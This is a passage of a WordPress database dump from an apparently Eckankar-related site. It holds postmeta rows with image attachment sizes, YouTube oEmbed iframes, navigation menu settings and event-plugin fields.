ogged-in\";i:36;s:13:\"nmr-logged-in\";i:37;s:13:\"nmr-logged-in\";i:38;s:13:\"nmr-logged-in\";i:39;s:13:\"nmr-logged-in\";i:40;s:13:\"nmr-logged-in\";i:41;s:13:\"nmr-logged-in\";i:42;s:13:\"nmr-logged-in\";i:43;s:13:\"nmr-logged-in\";i:44;s:13:\"nmr-logged-in\";i:45;s:13:\"nmr-logged-in\";i:46;s:13:\"nmr-logged-in\";i:47;s:13:\"nmr-logged-in\";i:48;s:13:\"nmr-logged-in\";i:49;s:13:\"nmr-logged-in\";i:50;s:13:\"nmr-logged-in\";i:51;s:13:\"nmr-logged-in\";i:52;s:13:\"nmr-logged-in\";i:53;s:13:\"nmr-logged-in\";i:54;s:13:\"nmr-logged-in\";i:55;s:13:\"nmr-logged-in\";i:56;s:13:\"nmr-logged-in\";}'),(6783,81469,'_wp_attached_file','2019/08/moon-river.jpg'),(6784,81469,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1200;s:4:\"file\";s:22:\"2019/08/moon-river.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"moon-river-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"moon-river-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"moon-river-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"moon-river-1024x640.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:20:\"moon-river-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:22:\"moon-river-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:22:\"moon-river-250x156.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:22:\"moon-river-550x344.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:22:\"moon-river-800x500.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:22:\"moon-river-288x180.jpg\";s:5:\"width\";i:288;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:22:\"moon-river-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:22:\"moon-river-800x500.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:22:\"moon-river-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:22:\"moon-river-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:23:\"moon-river-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(8209,108956,'_menu_item_object','custom'),(8208,108956,'_menu_item_object_id','108956'),(8207,108956,'_menu_item_menu_item_parent','0'),(8206,108956,'_menu_item_type','custom'),(6926,91821,'_oembed_1ad0fe5f0d83c4490e038e6c19bd9e3f','<iframe title=\"City at Night\" width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/5LxGNTTxPis?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(6927,91821,'_oembed_time_1ad0fe5f0d83c4490e038e6c19bd9e3f','1565037290'),(6928,91821,'_oembed_1f72b9b20df6dad278506c9cdf9fe828','<iframe title=\"City at Night\" width=\"780\" height=\"439\" src=\"https://www.youtube.com/embed/5LxGNTTxPis?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(6929,91821,'_oembed_time_1f72b9b20df6dad278506c9cdf9fe828','1565037328'),(6930,91821,'_oembed_0c9cbe354d9dd68224aff14834faa928','<iframe title=\"City at Night\" width=\"391\" height=\"220\" src=\"https://www.youtube.com/embed/5LxGNTTxPis?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(6931,91821,'_oembed_time_0c9cbe354d9dd68224aff14834faa928','1565037790'),(6950,91821,'_oembed_9c6c83ce1754c143dfbadcc5fd5387bf','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"500\" height=\"375\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(6951,91821,'_oembed_time_9c6c83ce1754c143dfbadcc5fd5387bf','1565119863'),(6952,91821,'_oembed_e5da9c8f54bbc7142247da73e8f09c53','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(6953,91821,'_oembed_time_e5da9c8f54bbc7142247da73e8f09c53','1565119884'),(6954,93410,'_wp_attached_file','2019/08/HU1.mp3'),(6955,93410,'_wp_attachment_metadata','a:16:{s:10:\"dataformat\";s:3:\"mp3\";s:8:\"channels\";i:2;s:11:\"sample_rate\";i:44100;s:7:\"bitrate\";i:320000;s:11:\"channelmode\";s:6:\"stereo\";s:12:\"bitrate_mode\";s:3:\"cbr\";s:5:\"codec\";s:4:\"LAME\";s:7:\"encoder\";s:9:\"LAME3.96r\";s:8:\"lossless\";b:0;s:15:\"encoder_options\";s:15:\"--preset insane\";s:17:\"compression_ratio\";d:0.22675736961451248;s:10:\"fileformat\";s:3:\"mp3\";s:8:\"filesize\";i:12004831;s:9:\"mime_type\";s:10:\"audio/mpeg\";s:6:\"length\";i:300;s:16:\"length_formatted\";s:4:\"5:00\";}'),(6956,93410,'_edit_lock','1565120415:2'),(6957,91821,'_oembed_ea15cb74f0c87f4e5f138fc23cea445b','<blockquote class=\"wp-embedded-content\" data-secret=\"FhCne9rQr6\"><a href=\"https://eckankar-colorado.org/hu1/\">HU1</a></blockquote><iframe title=\"&#8220;HU1&#8221; &#8212; Eckankar in Colorado\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"https://eckankar-colorado.org/hu1/embed/#?secret=FhCne9rQr6\" data-secret=\"FhCne9rQr6\" width=\"500\" height=\"282\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'),(6958,91821,'_oembed_time_ea15cb74f0c87f4e5f138fc23cea445b','1565120054'),(6963,91821,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1641576275'),(6962,91821,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(6966,94617,'_wp_attached_file','2019/08/ocean-2.jpg'),(6967,94617,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:19:\"2019/08/ocean-2.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"ocean-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"ocean-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"ocean-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"ocean-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:17:\"ocean-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:19:\"ocean-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:19:\"ocean-2-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:19:\"ocean-2-550x309.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:19:\"ocean-2-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:19:\"ocean-2-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:19:\"ocean-2-533x300.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:19:\"ocean-2-889x500.jpg\";s:5:\"width\";i:889;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:19:\"ocean-2-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:19:\"ocean-2-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:20:\"ocean-2-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6983,98466,'_wp_attached_file','2019/08/miracles_video.jpg'),(6984,98466,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:360;s:6:\"height\";i:192;s:4:\"file\";s:26:\"2019/08/miracles_video.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"miracles_video-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"miracles_video-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:24:\"miracles_video-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:26:\"miracles_video-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:26:\"miracles_video-250x133.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:26:\"miracles_video-338x180.jpg\";s:5:\"width\";i:338;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:26:\"miracles_video-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6985,98466,'_edit_lock','1580010980:2'),(6986,98466,'_wc_gallery_custom_image_link',''),(6987,98466,'_edit_last','2'),(73572,254554,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:147;s:6:\"height\";i:217;s:4:\"file\";s:58:\"2020/01/a-modern-prophet-answers-your-questions-book-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"a-modern-prophet-answers-your-questions-book-1-147x150.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:56:\"a-modern-prophet-answers-your-questions-book-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:58:\"a-modern-prophet-answers-your-questions-book-1-122x180.jpg\";s:5:\"width\";i:122;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:58:\"a-modern-prophet-answers-your-questions-book-1-147x150.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27467,198801,'_wp_attached_file','2019/10/harold-bg-tabs-B.jpg'),(27468,198801,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:167;s:6:\"height\";i:216;s:4:\"file\";s:28:\"2019/10/harold-bg-tabs-B.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-B-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"harold-bg-tabs-B-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-B-139x180.jpg\";s:5:\"width\";i:139;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-B-167x150.jpg\";s:5:\"width\";i:167;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7013,99531,'_edit_lock','1565211979:2'),(7011,99531,'_wp_attached_file','2019/08/modern-prophet-tabs-2.jpg'),(7012,99531,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:216;s:4:\"file\";s:33:\"2019/08/modern-prophet-tabs-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"modern-prophet-tabs-2-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:31:\"modern-prophet-tabs-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:33:\"modern-prophet-tabs-2-121x180.jpg\";s:5:\"width\";i:121;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:33:\"modern-prophet-tabs-2-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73571,254554,'_wp_attached_file','2020/01/a-modern-prophet-answers-your-questions-book-1.jpg'),(27443,198743,'_wp_attached_file','2019/10/forest-light.jpg'),(27444,198743,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:206;s:4:\"file\";s:24:\"2019/10/forest-light.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"forest-light-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"forest-light-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:22:\"forest-light-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:24:\"forest-light-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:24:\"forest-light-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:24:\"forest-light-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:24:\"forest-light-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(8276,109539,'_menu_item_target',''),(8277,109539,'_menu_item_classes','a:57:{i:0;s:0:\"\";i:1;s:13:\"nmr-logged-in\";i:2;s:13:\"nmr-logged-in\";i:3;s:13:\"nmr-logged-in\";i:4;s:13:\"nmr-logged-in\";i:5;s:13:\"nmr-logged-in\";i:6;s:13:\"nmr-logged-in\";i:7;s:13:\"nmr-logged-in\";i:8;s:13:\"nmr-logged-in\";i:9;s:13:\"nmr-logged-in\";i:10;s:13:\"nmr-logged-in\";i:11;s:13:\"nmr-logged-in\";i:12;s:13:\"nmr-logged-in\";i:13;s:13:\"nmr-logged-in\";i:14;s:13:\"nmr-logged-in\";i:15;s:13:\"nmr-logged-in\";i:16;s:13:\"nmr-logged-in\";i:17;s:13:\"nmr-logged-in\";i:18;s:13:\"nmr-logged-in\";i:19;s:13:\"nmr-logged-in\";i:20;s:13:\"nmr-logged-in\";i:21;s:13:\"nmr-logged-in\";i:22;s:13:\"nmr-logged-in\";i:23;s:13:\"nmr-logged-in\";i:24;s:13:\"nmr-logged-in\";i:25;s:13:\"nmr-logged-in\";i:26;s:13:\"nmr-logged-in\";i:27;s:13:\"nmr-logged-in\";i:28;s:13:\"nmr-logged-in\";i:29;s:13:\"nmr-logged-in\";i:30;s:13:\"nmr-logged-in\";i:31;s:13:\"nmr-logged-in\";i:32;s:13:\"nmr-logged-in\";i:33;s:13:\"nmr-logged-in\";i:34;s:13:\"nmr-logged-in\";i:35;s:13:\"nmr-logged-in\";i:36;s:13:\"nmr-logged-in\";i:37;s:13:\"nmr-logged-in\";i:38;s:13:\"nmr-logged-in\";i:39;s:13:\"nmr-logged-in\";i:40;s:13:\"nmr-logged-in\";i:41;s:13:\"nmr-logged-in\";i:42;s:13:\"nmr-logged-in\";i:43;s:13:\"nmr-logged-in\";i:44;s:13:\"nmr-logged-in\";i:45;s:13:\"nmr-logged-in\";i:46;s:13:\"nmr-logged-in\";i:47;s:13:\"nmr-logged-in\";i:48;s:13:\"nmr-logged-in\";i:49;s:13:\"nmr-logged-in\";i:50;s:13:\"nmr-logged-in\";i:51;s:13:\"nmr-logged-in\";i:52;s:13:\"nmr-logged-in\";i:53;s:13:\"nmr-logged-in\";i:54;s:13:\"nmr-logged-in\";i:55;s:13:\"nmr-logged-in\";i:56;s:13:\"nmr-logged-in\";}'),(8274,109539,'_menu_item_object_id','33265'),(8275,109539,'_menu_item_object','page'),(8273,109539,'_menu_item_menu_item_parent','108956'),(8272,109539,'_menu_item_type','post_type'),(143825,265166,'mec_op','a:0:{}'),(143824,265166,'mec_reg_fields','a:0:{}'),(143802,265166,'mec_certain_weekdays','a:0:{}'),(143803,265166,'mec_allday','0'),(143804,265166,'mec_hide_time','0'),(143805,265166,'mec_hide_end_time','0'),(143806,265166,'mec_comment',''),(143807,265166,'mec_repeat_status','0'),(143808,265166,'mec_repeat_type',''),(143809,265166,'mec_repeat_interval','1'),(143810,265166,'mec_repeat_end',''),(143811,265166,'mec_repeat_end_at_occurrences',''),(143812,265166,'mec_repeat_end_at_date',''),(143813,265166,'mec_advanced_days','a:0:{}'),(143814,265166,'mec_in_days',''),(143815,265166,'mec_not_in_days',''),(143816,265166,'mec_hourly_schedules','a:0:{}'),(143817,265166,'mec_booking','a:0:{}'),(143818,265166,'mec_tickets','a:0:{}'),(143819,265166,'mec_fees_global_inheritance','1'),(143820,265166,'mec_fees','a:0:{}'),(143821,265166,'mec_ticket_variations_global_inheritance','1'),(143822,265166,'mec_ticket_variations','a:0:{}'),(143823,265166,'mec_reg_fields_global_inheritance','1'),(143801,265166,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(8262,108956,'_nav_menu_role','in'),(8278,109539,'_menu_item_xfn',''),(7073,104339,'_wp_attached_file','2019/08/login-bk-7.jpg'),(7074,104339,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1617;s:6:\"height\";i:1001;s:4:\"file\";s:22:\"2019/08/login-bk-7.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"login-bk-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"login-bk-7-300x186.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:186;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"login-bk-7-768x475.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:475;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"login-bk-7-1024x634.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:634;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:20:\"login-bk-7-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:22:\"login-bk-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:22:\"login-bk-7-250x155.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:22:\"login-bk-7-550x340.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:22:\"login-bk-7-800x495.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:495;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:22:\"login-bk-7-291x180.jpg\";s:5:\"width\";i:291;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:22:\"login-bk-7-485x300.jpg\";s:5:\"width\";i:485;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:22:\"login-bk-7-808x500.jpg\";s:5:\"width\";i:808;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:22:\"login-bk-7-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:22:\"login-bk-7-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:23:\"login-bk-7-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6